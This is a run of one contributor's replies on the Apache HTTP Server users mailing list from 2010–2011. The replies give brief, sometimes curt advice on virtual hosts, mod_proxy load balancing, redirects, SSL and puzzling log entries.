See http://httpd.apache.org/userslist.html> for more info.
To unsubscribe, e-mail: users-unsubscr...@httpd.apache.org
  "   from the digest: users-digest-unsubscr...@httpd.apache.org
For additional commands, e-mail: users-h...@httpd.apache.org

Re: [us...@httpd] SetEnv HTTPS on... not working.

[Jeroen Geilman]

On 12/10/10 12:55 PM, Mxrgus Pxrt wrote:
I have SSL offloader, what checks wheather user came using HTTP or 
HTTPS (sends accordingly header.)


As I want it to be transparent to application and available to 
.htaccess, I use apaches values. I want to overwrite them.


Switching from HTTP to HTTPS cannot be transparent. ever.

--
J.


-
The official User-To-User support forum of the Apache HTTP Server Project.
See http://httpd.apache.org/userslist.html> for more info.
To unsubscribe, e-mail: users-unsubscr...@httpd.apache.org
  "   from the digest: users-digest-unsubscr...@httpd.apache.org
For additional commands, e-mail: users-h...@httpd.apache.org

Re: [us...@httpd] Virtual Servers Help

[Jeroen Geilman]

On 12/20/10 7:44 PM, Afsar Mohiuddin wrote:
Given the facts. Any other ideas? Is there something that I should be 
trying.




This is a network problem.

Either your internet connection is down often, or somebody incompetent 
manages your network and/or name services.


It's not an apache issue.

You should deploy solid monitoring tools and present evidence to the 
person(s) responsible.


--
J.

Re: [us...@httpd] httpd monitoring

[Jeroen Geilman]

On 12/21/10 12:42 PM, Hugo Gomes wrote:

Hi all,

I'm managing a web server, and time to time, my machine load average
goes up, and when I run 'top' I see 1 or 2 httpd process consuming CPU
and Memory.
So my question is, there is any tools that i can monitored my machine
and i could get what scripts on my web server make this happen.

Ex. A tool that checks what cpu and memory my web pages scripts  are
consuming at X time?



Load and enable mod_status 
:http://httpd.apache.org/docs/2.2/mod/mod_status.html


Set ExtendedStatus On in your global config to see what is consuming 
what, or call it with "/URI?auto" to make the output parsable by scripts 
(there are cacti scripts that graph this data)


--
J.


-
The official User-To-User support forum of the Apache HTTP Server Project.
See http://httpd.apache.org/userslist.html> for more info.
To unsubscribe, e-mail: users-unsubscr...@httpd.apache.org
  "   from the digest: users-digest-unsubscr...@httpd.apache.org
For additional commands, e-mail: users-h...@httpd.apache.org

Re: [us...@httpd] Restricting config to a single virtualhost

[Jeroen Geilman]

On 12/24/10 5:34 PM, Lorenzo Milesi wrote:

And what's wrong with having the config (included) in the SSL-only
vhost alone?

Because I would need to place those config files elsewhere, which means every 
time I upgrade the package I should take care of remembering where they are and 
update them.
This way they're in place, and aptitude will prompt me for diffs, if it needs 
to.

That's such nonsense.
Package upgrades do not touch files that were modified manually.

--
J.


-
The official User-To-User support forum of the Apache HTTP Server Project.
See http://httpd.apache.org/userslist.html> for more info.
To unsubscribe, e-mail: users-unsubscr...@httpd.apache.org
  "   from the digest: users-digest-unsubscr...@httpd.apache.org
For additional commands, e-mail: users-h...@httpd.apache.org

Re: [us...@httpd] Restricting config to a single virtualhost

[Jeroen Geilman]

On 12/28/10 11:56 AM, Joost de Heer wrote:

On Mon, December 27, 2010 13:25, Jeroen Geilman wrote:


That's such nonsense.
Package upgrades do not touch files that were modified manually.

But they do recreate files if they're moved to a different location. And
that was what OP was referring to (my suggestion to rename/move the
gitweb.conf file).



I see.
I wouldn't do that, if you want to keep using the package manager.

Just leave the file empty and use a different file.

--
J.


-
The official User-To-User support forum of the Apache HTTP Server Project.
See http://httpd.apache.org/userslist.html> for more info.
To unsubscribe, e-mail: users-unsubscr...@httpd.apache.org
  "   from the digest: users-digest-unsubscr...@httpd.apache.org
For additional commands, e-mail: users-h...@httpd.apache.org

Re: [us...@httpd] Re: httpd mod_jk cluster

[Jeroen Geilman]

On 12/28/10 3:18 PM, Don Hill wrote:
What I really want to know is there a better design that I should use 
to gain performance. 


Umm.. switch to using mod_proxy_ajp, as the apache documentation suggests ?

It offers a binary interface and much improved speed.


for example

1.) create multiple HTTPD servers, 2 servers per machine. Each serving 
2 tomcats JVM


Why ?
Is your tomcat setup not multithreaded ?

2.) use load balancer in workers to handle the load balance to the 
JVM's. The current configuration is balancing through the vhosts and 
each vhost has a worker for a JVM instance.


That doesn't really make any sense. You can load balance connections, 
but what does "load balance through vhosts" mean ?




On Mon, Dec 27, 2010 at 9:05 PM, Don Hill > wrote:


Hi.

I am working on a tomcat 5.5 cluster which is using ajp/1.3 and
mod_jk and trying to determine the best cluster design given the
hardware. I have 2 xeon 2.3 ghz 2 CPU machines with 38GB ram
machine. Currently here is the config I am using. The TOMCAT and
HTTPD servers are on the same physical machine.

Each machine is running HTTPD 1.3 with prefork,



You're joking.
Apache 1.3 is EOL. No longer supported. d-e-d-d DEAD.


the MaxClients is 256 due compiled in limits. Each machine has 4
virtualhosts running through one instance of HTTPD. Two of the
VHOSTS are the same app running on 2 Tomcat 5.5 with 8GB
RAM(configured by customer). The workers are configured to each
VHOST meaning for each machine there are 4 workers defined and one
worker is defined for each VHOST. I will try and depict this
below. The current load balancing is controlled by F5 and manages
the load across 2 machines, 4 VHOST for each app.

Based on this info can someone recommend if this configuration
could be improved and if so what would you recommend ?



Shit yes - replace apache by something from this century. 2.2.17 is current.

Then proceed to learn all about mod_proxy_balancer, which was made for 
this kind of setup.



--
J.

Re: [us...@httpd] cannot get UserDir to work

[Jeroen Geilman]

On 12/30/10 7:57 PM, Jeff Shearer wrote:

I am not able to successfully implement UserDir in Apache.  I am able to successfully 
reach the DocumentRoot.  However, when I include the user's name following the domain, 
for example, "*.com/wendellmoore," I receive a 404 error.  Following is some 
information that should prove useful in understanding my environment.




# cat /usr/local/etc/apache22/Includes/users.txt>>  userdir.txt

   UserDir disabled
   UserDir enabled wendellmoore
   UserDir /disk2/*/public>




Is this block active in the context of the host you requested ?

Show the output of httpd -S, and the exact URL you requested.

--
J.


-
The official User-To-User support forum of the Apache HTTP Server Project.
See http://httpd.apache.org/userslist.html> for more info.
To unsubscribe, e-mail: users-unsubscr...@httpd.apache.org
  "   from the digest: users-digest-unsubscr...@httpd.apache.org
For additional commands, e-mail: users-h...@httpd.apache.org

Re: [us...@httpd] [SOLVED] Re: egrep: /etc/bind/rndc.key: Permission denied

[Jeroen Geilman]

On 12/31/10 6:16 AM, Michelle Konzack wrote:

After a second sleepless night I have found the egrep pig.

On my VServers I generate a list for Hosts which are on the appropriated
VServer.  I do this by

   exec("egrep --no-filename --regexp=\"(ORIGIN|CNAME.*" . $VServer[0] ."\.)\" 
/etc/bind/*", $LIST);

and it automaticaly hit /etc/bind/rndc.key which is not a zone file.

This has changed now, since I make a direct SSH call to my NameServers.

Thanks, Greetings and nice Day/Evening
 Michelle Konzack



What do you think BIND has to do with apache HTTPD ?


--
J.


-
The official User-To-User support forum of the Apache HTTP Server Project.
See http://httpd.apache.org/userslist.html> for more info.
To unsubscribe, e-mail: users-unsubscr...@httpd.apache.org
  "   from the digest: users-digest-unsubscr...@httpd.apache.org
For additional commands, e-mail: users-h...@httpd.apache.org

Re: [users@httpd] ssl over https with ubuntu server 10.04

[Jeroen Geilman]

On 1/15/11 11:02 PM, Teun wrote:

Hi everybody,

I did follow a wiki to enable a secure ssl conection with my https://server/


How about the actual documentation: 
http://httpd.apache.org/docs/current/ssl/



But there is still a problem. Can you help me to analise the problem?


Not without any information whatsoever, no.


I did open my port 443 on my router. I am not a beginner and not a
high-end user. Just normal.  So there is nothing wrong what i did.


That's an unwarranted assumption on your part.

And as far as apache goes, you obviously are a beginner (not that that 
is a bad thing)



But
lets begin start to analyse please?


...how ?


--
J.


-
The official User-To-User support forum of the Apache HTTP Server Project.
See http://httpd.apache.org/userslist.html> for more info.
To unsubscribe, e-mail: users-unsubscr...@httpd.apache.org
  "   from the digest: users-digest-unsubscr...@httpd.apache.org
For additional commands, e-mail: users-h...@httpd.apache.org

Re: [users@httpd] Log entries

[Jeroen Geilman]

On 1/14/11 9:31 AM, Jørn wrote:

Hello,

This may be a bit off-topic but...

During the last months I have noticed this kind of entries in the apache log
file:

84.48.198.105 - - [09/Jan/2011:12:41:24 +0100]
"GET 
/dahls/Vin/url(res://C:/Programfiler/Google/Google%20Toolbar/Component/GoogleToolbarDynamic_mui_en_E11712C84EA7E12B.dll/
findy_buttons.png) HTTP/1.1" 404 333

217.144.240.150 - - [14/Jan/2011:09:24:39 +0100]
"GET 
/dahls/Nofaq/Trening/url(data:image/png;base64,iVBORw0KGgoNSUhEUgAAADgOCAYAAAB6pd%2buAXNSR0IArs4c6QZiS0dEAP8A%2fwD%2foL2nkwlwSFlzAAALEwAACxMBAJqcGAd0SU1FB9oGAhENK17O5ogZdEVYdENvbW1lbnQAQ3JlYXRlZCB3aXRoIEdJTVBXgQ4XAAAD6UlEQVRIx82WXWxTdRjGf6fndO3adbZ0VLoP9gFMXZQFNgSWDEkEYtSQkNVg4o2JH9NGJTMk6k01vTIhXshFzTCKE5NFORoXXDBs4nTMZHMzSETHDKyQyb7Xbu36dc7p8aaQZm5GNzd8rk7evOf%2fz%2fM%2bz%2f99X4E1htcn68v5742mffVRJd19uucqH539lSq3yKuHtlDmkPj99aPYe39kfRoMOqgCJHSdJNRL3AEE%2fB7h3xZFgO6JuRQdl6PE8zfRPzlF71CEojoXFc%2b9SPy3KxjCc%2bgCpIE0IilB65YWHFQBfAbUZEIDQGPA7xngDsNgMpFUY0Q0ESHHhKbkM3A9yoFqDceGQpTijWjhXxCAtC6gCWk0BAwLzqkAQsC6TJVDGcKrZdeDXp%2fcvki8zeuTH8uO6ehYzRJumxEUBUkyMa%2baUDWBVDLNnJJgNE9ixGZiOlckaQAVAWmBdTqBzqxQJ%2fD2KgrTCDzq9clywO%2fxZMi1AgcBBbhNPhyJ47TlsGuzjaHRSRRdoKq8AF3XOdvZw1BMQneUMl9iZN4eo3AmRWVwFulvqusAngBOryLBY0AcaPD65LeAFPAk0BLwe57OTnz3i4sc3ruFx2s24MwzoWgaW4tNnPn0JLt37KJ2zwGMgk5X3zd8ONJOX7mGvcK5OEGvT94HNGcs2rjSzrhUUwn4PV1AV4bcm5nwkYDfc3xhbs%2bVWQZH%2btlekc%2fDtRupKrub1uYT7NhWw9bde%2fl2REUSRR56pJT0lxofhM8xaheXVPA1oDPg9zT%2bExmsDqF8hUqmlvi%2bDUs6RWhW5Ov%2bKaxmK5XFLkIzIe7f%2fiBtwypPVZqIRWJ8Ny6x09OEJJs5rrTxn4yJY00NwRU0mtaMLY9kyL3n9clVAb%2fnley8wnyBkkIHrgILm925JGPTJONRDHqaHDQmx2a4Ph4hpFkpcZqZmBhHtbI4wYDfs3%2bNhn5bpqG03LKl1ydXAS97fXJ%2b9jv0Hq6lyK5C%2fBJ6PEjyj2nW2VQGLw5gLKqn92YSxWgjbrRy89ogVosFoyT%2bZUzcurjD65M71oDjCeDzbCIZ5VqAk9mJm9w5zAdPkRx%2bB3H6Y3Kj7TxQMkzLqfe5V71GvttFiduOa3aQc58E6JseJJXSEVhjeH2yvpxN5qVnygj%2fdJQCWxjBAOm0gVRC5MLPdoZnt2F3rsdisTAV7MBlusT3oVK6TOriCv4fIZnsSDlu1IQRNWVGV83kYKFuZzX7PQ1MFOg0j53nh%2bg8qpLg2eogeyJ53JFddDkLtyiZ6%2b%2b674Vu5cZXiIkJdAEMjnvIqzjEjVCS7rmrhOwC0Vwn58fqkIIXeL72Mn8CJn6UfKGeNt4ASUVORK5CYII%3d)
HTTP/1.1" 404 1801

I wonder what is causing this?


A client is requesting these URLs.


  Seem to be some kind of badly configured
"google feature" on the client side, or?



Yes, probably.



--
J.



-
The official User-To-User support forum of the Apache HTTP Server Project.
See http://httpd.apache.org/userslist.html> for more info.
To unsubscribe, e-mail: users-unsubscr...@httpd.apache.org
  "   from the digest: users-digest-unsubscr...@httpd.apache.org
For additional commands, e-mail: users-h...@httpd.apache.org

Re: [users@httpd] webservice clustering trouble

[Jeroen Geilman]

On 1/14/11 5:29 PM, Lukas Sklenar wrote:

Hello,

I have deployed 3 tomcat6.0.29 webapps, each of which exposes a
webservice, and am using apache2.2 and mod_jk-1.2.31-httpd-2.2.3.so to
cluster them - a performance exercise.


2.2.3 is quite old.

Also, mod_jk is deprectaed in favour of mod_proxy_ajp.




I am ready to post my config if need be, but wanted to know if someone
has come across this before?


You apache httpd config, if relevant to the issue, is welcome.


I can find some reference in the archives which suggests I should update
tomcat/apache/java etc but I have the latest versions already.


No you don't. Apache httpd is at least 14 versions behind.


This message should be regarded as confidential.


Not really.


If you have received this email in error


You tell me.


  please notify the sender and destroy it immediately.


Will do!

Idiot disclaimers.

--
J.


-
The official User-To-User support forum of the Apache HTTP Server Project.
See http://httpd.apache.org/userslist.html> for more info.
To unsubscribe, e-mail: users-unsubscr...@httpd.apache.org
  "   from the digest: users-digest-unsubscr...@httpd.apache.org
For additional commands, e-mail: users-h...@httpd.apache.org

Re: [users@httpd] webservice clustering trouble

[Jeroen Geilman]

On 1/16/11 12:30 AM, Joost de Heer wrote:

On 01/16/2011 12:19 AM, Jeroen Geilman wrote:

On 1/14/11 5:29 PM, Lukas Sklenar wrote:

Hello,

I have deployed 3 tomcat6.0.29 webapps, each of which exposes a
webservice, and am using apache2.2 and mod_jk-1.2.31-httpd-2.2.3.so to
cluster them - a performance exercise.


2.2.3 is quite old.


2.2.3 is the version that RHEL 5 ships. Redhat patches most of the 
stuff released in a later version but keeps the version at 2.2.3.


For FOURTEEN versions ?

That sounds idiotic on the face of it.

--
J.


-
The official User-To-User support forum of the Apache HTTP Server Project.
See http://httpd.apache.org/userslist.html> for more info.
To unsubscribe, e-mail: users-unsubscr...@httpd.apache.org
  "   from the digest: users-digest-unsubscr...@httpd.apache.org
For additional commands, e-mail: users-h...@httpd.apache.org

Re: [users@httpd] http reference link

[Jeroen Geilman]

On 1/19/11 11:07 PM, George Christidis wrote:

Hi, I have a question about the link google references for my website on search 
results. It appears as www.website.com\main_dir\?q=shab100500


That is very unlikely, as it is not a valid URL.
It is probably listed as www.website.com/main_dir/?q=shab100500


Not sure if this is coming from an apache setting or google itself or the php 
code.


It's a valid URL with a query string.


  I don't know what it means. I am still learning apache, so for now I have my 
site on a web host. My host recently migrated my data to a new server so they 
might have changed something in apache?


If this did not use to happen, they may have made htaccess rewrite 
changes; ask them what they did.


It is not a problem, as it is a valid URL.


--
J.


-
The official User-To-User support forum of the Apache HTTP Server Project.
See http://httpd.apache.org/userslist.html> for more info.
To unsubscribe, e-mail: users-unsubscr...@httpd.apache.org
  "   from the digest: users-digest-unsubscr...@httpd.apache.org
For additional commands, e-mail: users-h...@httpd.apache.org

Re: [users@httpd] Apache Reverse Proxy

[Jeroen Geilman]

On 1/18/11 10:29 PM, Christian Pascher wrote:

Hi,

I have a topology with two apache webservers. I want to set up a new 
server as a reverse proxy with caching and load balancing.


mod_proxy_balancer will do nicely.

As far as I know, this works fine with apache and I don't need extra 
software like squid. Am I right?


It depends on your requirements, really.

If you need esoteric things like (external) proxy authentication or 
fine-grained client ACLs, squid is better equipped for that.


As an application frontend loadbalancer, apache works very well.


--
J.


-
The official User-To-User support forum of the Apache HTTP Server Project.
See http://httpd.apache.org/userslist.html> for more info.
To unsubscribe, e-mail: users-unsubscr...@httpd.apache.org
  "   from the digest: users-digest-unsubscr...@httpd.apache.org
For additional commands, e-mail: users-h...@httpd.apache.org

Re: [users@httpd] Apache Reverse Proxy

[Jeroen Geilman]

On 1/21/11 12:51 PM, Christian Pascher wrote:
So, if I want to provide HTTPS connections, it is possible to use a 
Apache Server as loadbalancer?


It's always nice to get new requirements after the fact.

You did not specify HTTPS before, did you ?

AFAIK mod_proxy will handle both http-to-https and https-to-http just fine.


And how do I configure that?


The way the documentation tells you to.

http://httpd.apache.org/docs/current/mod/mod_proxy_balancer.html


--
J.


-
The official User-To-User support forum of the Apache HTTP Server Project.
See http://httpd.apache.org/userslist.html> for more info.
To unsubscribe, e-mail: users-unsubscr...@httpd.apache.org
  "   from the digest: users-digest-unsubscr...@httpd.apache.org
For additional commands, e-mail: users-h...@httpd.apache.org

Re: [users@httpd] Redirect to the diff. servers.

[Jeroen Geilman]

On 1/23/11 6:46 PM, Tushar Chavan wrote:

Hi Experts,

We have below requirement.

There are two portal servers . Portal 1 --> with url 
http://epsrm.xyz.com:5/irj & Portal 2 ---> with 
https://srmprd.xyz.com:5/irj


Apache server is srmarp.

Now can we redirect traffic from apache to  Portal 1 & Portal 2 from 
same Apache host.


I can use

ProxyPass irj http://epsrm.xyz.com:5/irj
ProxyPassreverse   irj http://epsrm.xyz.com:5/irj


what about other?



Other what ?

Plane of existence ?

--
J.

Re: [users@httpd] Password Protection Ignored

[Jeroen Geilman]

On 1/22/11 1:45 PM, --[ UxBoD ]-- wrote:

Hi,

I have a reports directory I wish to secure and have created the necessary 
.htaccess file:


Don't.
Just use the configuration file if you have access to it.

It will make life so much easier.



--
J.


-
The official User-To-User support forum of the Apache HTTP Server Project.
See http://httpd.apache.org/userslist.html> for more info.
To unsubscribe, e-mail: users-unsubscr...@httpd.apache.org
  "   from the digest: users-digest-unsubscr...@httpd.apache.org
For additional commands, e-mail: users-h...@httpd.apache.org

Re: [users@httpd] Password Protection Ignored

[Jeroen Geilman]

On 1/24/11 9:38 AM, --[ UxBoD ]-- wrote:


- Original Message -

On 1/22/11 1:45 PM, --[ UxBoD ]-- wrote:

Hi,

I have a reports directory I wish to secure and have created the
necessary .htaccess file:

Don't.
Just use the configuration file if you have access to it.

It will make life so much easier.



--
J.


-
The official User-To-User support forum of the Apache HTTP Server
Project.
Seehttp://httpd.apache.org/userslist.html>  for more info.
To unsubscribe, e-mail: users-unsubscr...@httpd.apache.org
" from the digest: users-digest-unsubscr...@httpd.apache.org
For additional commands, e-mail: users-h...@httpd.apache.org

I have tried as-well adding it directly to httpd-vhosts.conf and get the same 
result :( Here is the virtual host entry if anybody can see what I have done 
wrong :(


Include logs from accesses so we can see what happens.
Also check if global or htaccess-based rewriting is going on anywhere.

--
J.


-
The official User-To-User support forum of the Apache HTTP Server Project.
See http://httpd.apache.org/userslist.html> for more info.
To unsubscribe, e-mail: users-unsubscr...@httpd.apache.org
  "   from the digest: users-digest-unsubscr...@httpd.apache.org
For additional commands, e-mail: users-h...@httpd.apache.org

Re: [users@httpd] cleanest/fastest way of redirecting aliases to canonical server names

[Jeroen Geilman]

On 1/29/11 2:38 AM, Christoph Anton Mitterer wrote:

Hi.

I'm having a vhost, which is reachable via one canonical name, e.g.
example.org, and also via several aliases, e.g. www.example.org,
example.com, etc.

I want that whenever requests are made via one of the aliases, that
those are redirected to the canonical name.


IMHO there are about the following two ways:
1)
- one vhost, which has the canonical name as ServerName, and the aliases
as ServerAliases
- and also has some RewriteCond+RewriteRules, making a redirect to the
canonical address if HTTP_HOST is one of the aliases.


This is generally the right way only if you have a hosted account, i.e. 
you only have access to one vhost period.

If you have control over httpd.conf, avoid rewriting as much as possible.


2)
- two vhosts, the first having only the canonical name as ServerName (no
ServerAlias)

- the second, having the aliases as ServerName/ServerAliases
- and also doing a Redirect / http://example.org


That would be my choice.


Can (2) be handled with more performance by Apache than (1) (as it
doesn't have to evaluate the RewriteConds and the regexps every time?


That's quite irrelevant, as the redirect requires an entire network 
round-trip, not to mention any client-side processing.


Rewrite performance is insignificant compared to the overhead of a 
network round-trip.


However, the Redirect forces the network round-trip regardless, so it's 
a moot point.



At least (1) seems to be cleaner readable to me (from a config file
point of view)



No, it's not cleaner at all. Using Rewrites funges your output and makes 
troubleshooting harder.



--
J.


-
The official User-To-User support forum of the Apache HTTP Server Project.
See http://httpd.apache.org/userslist.html> for more info.
To unsubscribe, e-mail: users-unsubscr...@httpd.apache.org
  "   from the digest: users-digest-unsubscr...@httpd.apache.org
For additional commands, e-mail: users-h...@httpd.apache.org

Re: [users@httpd] problem with extra numbers after %h hostname/ip address in access_log

[Jeroen Geilman]

On 1/28/11 5:25 PM, Randy Tejas wrote:

Hello,

I'm seeing a problem in my logs where there are extra numbers at the 
end of an ip address:


10.56.194.252194.252
10.56.195.63.195.63

Apache seems to be duplicating the last two octects. Anybody seen this 
before and how to fix?


Server version: Apache/2.0.63
Server built:   Oct 24 2010 13:42:01

LogFormat "%h %l %u %t \"%r\" %>s %b \"%{Referer}i\" 
\"%{User-Agent}i\"" combined


This is where it began (Jan 10):
10.79.24.178 - - [09/Dec/2010:20:40:20 -0600] "GET /everest/ HTTP/1.1" 
200 98011
10.56.194.252194.252 - - [10/Jan/2011:16:57:37 -0600] "GET 
/images/search/ac_collectio

n_12x15.png HTTP/1.1" 404 316
10.56.194.252194.252 - - [10/Jan/2011:16:57:37 -0600] "GET 
/images/search/ac_pub_15x15

.png HTTP/1.1" 404 309

Thanks!



If you look at the above log, it only happens on 404s.
Are you redirecting ErrorDocuments somewhere ?

--
J.

Re: [users@httpd] cleanest/fastest way of redirecting aliases to canonical server names

[Jeroen Geilman]

On 1/29/11 12:49 PM, Joost de Heer wrote:



2)
- two vhosts, the first having only the canonical name as ServerName (no
ServerAlias)


3)
Two vhosts, the first having a bogus servername (e.g. 'redirecthost'), 
in which you do the redirection, and the second, which has the 
canonical name.




What happens when he wants to use this mechanism for multiple sets of 
canonical names and aliases ?


--
J.


-
The official User-To-User support forum of the Apache HTTP Server Project.
See http://httpd.apache.org/userslist.html> for more info.
To unsubscribe, e-mail: users-unsubscr...@httpd.apache.org
  "   from the digest: users-digest-unsubscr...@httpd.apache.org
For additional commands, e-mail: users-h...@httpd.apache.org

Re: [users@httpd] Incompatibilities between mod_remoteip and the server-info & server-status handlers?

[Jeroen Geilman]

On 1/28/11 6:27 PM, J.Lance Wilkinson wrote:
I've got a set of identical webservers, all Apache 2.2.6, with 
configurations such that authorized IP addresses are allowed access to 
locations handled by the server-info and server-status handlers.


These work fine when visiting the individual servers.

Now I put a load balancer in front of them all, and incorporate the 
mod_remoteip module into them to accept the load balancer inserted 
X-Forwarded-For header as the actual requesting IP address.




Meaning the load "balancer" has to do double work because unacceptable 
IPs are not blocked at the front gate. That's weird.


Users from acceptable IP addresses coming in through the load balancer 
get either a 404, a 403 or a blank page (and the error log shows an 
aborting child process in that case).




Put an apache load balancer in front and move the access lists to that 
server.



If there's a basic incompatibility between these handlers and 
mod_remoteip, like for example, maybe they do their thing BEFORE 
mod_remoteip appears in the processing stack, I'll accept that.   
After all, the main reason I want to do it from the load balancer is 
to just see which server is being handed any arbitrary request; it's a 
trivial thing.




Put an apache load balancer in front and move the access lists to that 
server.



But if it SHOULD be working I'd like to know what I'm doing wrong.




--
J.


-
The official User-To-User support forum of the Apache HTTP Server Project.
See http://httpd.apache.org/userslist.html> for more info.
To unsubscribe, e-mail: users-unsubscr...@httpd.apache.org
  "   from the digest: users-digest-unsubscr...@httpd.apache.org
For additional commands, e-mail: users-h...@httpd.apache.org

Re: [users@httpd] mod_dir with HTTPS

[Jeroen Geilman]

On 1/28/11 4:02 AM, Tao Lei wrote:

Hello.

It seems that mod_dir does not work properly with SSL (https).

When working with http, there is no problem:
If url "http://www.abc.com/test"; is requested, apache appends a "/" to the url and then 
respones to browser with code 301, telling it to request the newly-modified url 
""http://www.abc.com/test/";.

However, with https, things are not going as expected:
If url "https://www.abc.com/test"; is requested, the new url responsed by apache is 
"http://www.abc.com/test/";, but not "https://...";,


Then there are redirects or rewrites happening that you haven't 
discovered or admitted to.




--
J.


-
The official User-To-User support forum of the Apache HTTP Server Project.
See http://httpd.apache.org/userslist.html> for more info.
To unsubscribe, e-mail: users-unsubscr...@httpd.apache.org
  "   from the digest: users-digest-unsubscr...@httpd.apache.org
For additional commands, e-mail: users-h...@httpd.apache.org

Re: [users@httpd] One Apache for three diff. websites

[Jeroen Geilman]

On 2/1/11 8:54 AM, Tushar Chavan wrote:

Hi Joost,

1> First point I tried but it did not work. Also you are correct  , 
this is SAP system.


2>/Use name based virtual hosts to separate the requests ?/
//
Can you please give me hint consideting three diff. website? How 
to use /name based virtual hosts to separate the requests ?/



http://httpd.apache.org/docs/2.2/vhosts/


--
J.

Re: [users@httpd] Re: Domain Registrant's Details

[Jeroen Geilman]

On 2/5/11 5:56 AM, DW wrote:
Thanks Mike for your quick reply.  Is it easy to transfer the domain 
to my company?  Will the registrar ask many questions and corporate 
documentations?


It's relatively easy but still requires a written agreement from the 
owner or legal representative of the domain, and detailed WHOIS info for 
the new owner.



The reason I am asking this is somebody came to my place earlier today 
to ask about training courses.  I thought it should have been easier 
to browse the web and get the info and now I am concerned about this.


What does that even have to do with domain registration ?


--
J.


-
The official User-To-User support forum of the Apache HTTP Server Project.
See http://httpd.apache.org/userslist.html> for more info.
To unsubscribe, e-mail: users-unsubscr...@httpd.apache.org
  "   from the digest: users-digest-unsubscr...@httpd.apache.org
For additional commands, e-mail: users-h...@httpd.apache.org

Re: [users@httpd] Content Encoding Error :-

[Jeroen Geilman]

On 02/12/2011 06:27 AM, Tushar Chavan wrote:

Hi Team,

Below is my configuration :

ProxyPass   /irj http://idstrn:5/irj
ProxyPassReverse   /irj http://idstrn:5/irj

But when I execute http://Apache _host/irj

1> I get blank page in internet explorer
2> I get below error in Firefox.

Content Encoding Error
The page you are trying to view cannot be shown because it uses an 
invalid or unsupported form of compression.


Please let me know what could be the reason.



What does the apache log have to say about it ?

You need to determine whether it is apache or whatever you proxy to that 
is causing the issue.


--
J.

Re: [users@httpd] Domain Ownership Certificate - .COM registrations

[Jeroen Geilman]

On 02/12/2011 03:55 AM, DW wrote:
Does anybody know whether .com registrations allow you to have "Domain 
ownership certificate" for free?  For .co.uk domains, one can download 
the certificates from Nominet (UK's domain names managers & 
registrars) but I don't know if there is anything like that for .com 
domains (from ICANN I guess).  Even for .ru domains you get certificates.


Thanks.//



What use does this serve ?

If it's to show to somebody, that's up to the registrar.

If it's to prove your online credentials, you prove those when somebody 
ends up at your web site.


If it's for encryption and validation purposes, those are never free.


--
J.

Re: [users@httpd] suspicious proxy(?) URLs in logs

[Jeroen Geilman]

On 03/10/2011 02:16 PM, Rob De Langhe wrote:

hi,

while going occasionally through the access logs of a 2.2.17 Apache 
server, I noticed some URLs of remote locations where my server would 
have made a GET for ?!


an example:

194.0.122.134 - - [10/Mar/2011:02:26:55 +0100] "GET 
http://www.ebay.com/ HTTP/1.1" 200 240 "-" "Mozilla/4.0 (compatible; 
MSIE 4.01; Windows 95)"


So the status code = 200 indicates that the server allowed that URL 
"http://www.ebay.com";   for the client 
194.0.122.134 ...


And a Windows 95 client running IE4. Seriously.



I suspected that proxy functionality (enabled by default for long, 


Incorrect. ProxyRequests has never been On by default in any apache 
version that supports it.


The documentation clearly states that this is a security risk:

http://httpd.apache.org/docs/2.2/mod/mod_proxy.html#proxyrequests


but luckily in this 2.2.17 version it is not enabled by default in the 
configs), so I checked the loaded modules :


# /usr/apache2/bin/apachectl -t -D DUMP_MODULES | grep -i prox
#

so none.

Which other module or config setting could have as effect that my 
server accepts such requests ?


You need to provide more context - what distro is this ?
Did you install a package or compile it yourself ?
What does the error log say ?
What other modules are loaded ?


--
J.

Re: [users@httpd] suspicious proxy(?) URLs in logs

[Jeroen Geilman]

On 03/13/2011 01:53 AM, Eric Covener wrote:

On Thu, Mar 10, 2011 at 8:16 AM, Rob De Langhe
  wrote:
   

hi,

while going occasionally through the access logs of a 2.2.17 Apache server,
I noticed some URLs of remote locations where my server would have made a
GET for ?!

an example:

194.0.122.134 - - [10/Mar/2011:02:26:55 +0100] "GET http://www.ebay.com/
HTTP/1.1" 200 240 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows 95)"

So the status code = 200 indicates that the server allowed that URL
"http://www.ebay.com";  for the client 194.0.122.134 ...
 

This doesn't necessarily mean it was proxied.  Requests of this type
will just be served from your default (first-listed) vhost for
whatever iface it was received on.
   

...and was received by an application that accepts wildcard requests.

Any existing (and non-matching) content will simply 404 it.

Whether or not the application that blindly accepted it will try to 
retrieve the URL is a legitimate concern, but it would mean he is 
already running very dubious software.




--
J.


-
The official User-To-User support forum of the Apache HTTP Server Project.
See http://httpd.apache.org/userslist.html> for more info.
To unsubscribe, e-mail: users-unsubscr...@httpd.apache.org
  "   from the digest: users-digest-unsubscr...@httpd.apache.org
For additional commands, e-mail: users-h...@httpd.apache.org

Re: [users@httpd] Directories Being Probed Even When Index Listing Denied

[Jeroen Geilman]

On 03/19/2011 11:09 PM, ASAI wrote:

Greetings,

I am hosting a domain with no website which is a gateway for several 
applications.  Directory indexes are turned off, however I noticed in 
the logs today that one the directories which has no reference to the 
outside world was probed.  Is it possible that one can get the 
directory listing of a host even when index listing is turned off 
through some other agency?


How do I guard against things like this?


You'd have to provide sufficient proof that that is what is happening.
Apache does not log whether a directory listing was retrieved, or a 
normal file - so how do you KNOW this ?



--

J.


-
The official User-To-User support forum of the Apache HTTP Server Project.
See http://httpd.apache.org/userslist.html> for more info.
To unsubscribe, e-mail: users-unsubscr...@httpd.apache.org
  "   from the digest: users-digest-unsubscr...@httpd.apache.org
For additional commands, e-mail: users-h...@httpd.apache.org

Re: [users@httpd] reverse proxy based on user agent

[Jeroen Geilman]

On 03/24/2011 05:14 PM, Carlos del Castillo wrote:

Hello everyone, I have a web server that is load balancing two tomcat servers 
using the proxy module, all is working well but now I need to add a third one, 
but we need to send very specific user_agents to that third server. The URLs 
must be the same.

Right now my configuration looks like this:


ProxyRequests Off
ProxyVia Off
ProxyPreserveHost On


Order deny,allow
Allow from all



BalancerMember ajp://server1:8009 route=as1 loadfactor=50
BalancerMember ajp://server2:8009 route=as2 loadfactor=50



ProxyPass / balancer://cluster/ stickysession=JSESSIONID
ProxyPassReverse / balancer://cluster/

I've bee looking to the mod_rewirte module, but I'm not sure how I could add 
the third server and only send the specific user agents to that server.
   


This can be done fairly easily using a rewritecond:

RewriteCond %{HTTP_USER_AGENT} /some/matching/regex/
RewriteRule / ajp://server3:8009/ [P]

HOWEVER, this cannot be done inside the context of your balancer - 
unless you do all three this way.

So you lose the sessionID.

http://httpd.apache.org/docs/current/mod/mod_rewrite.html

--
J.


-
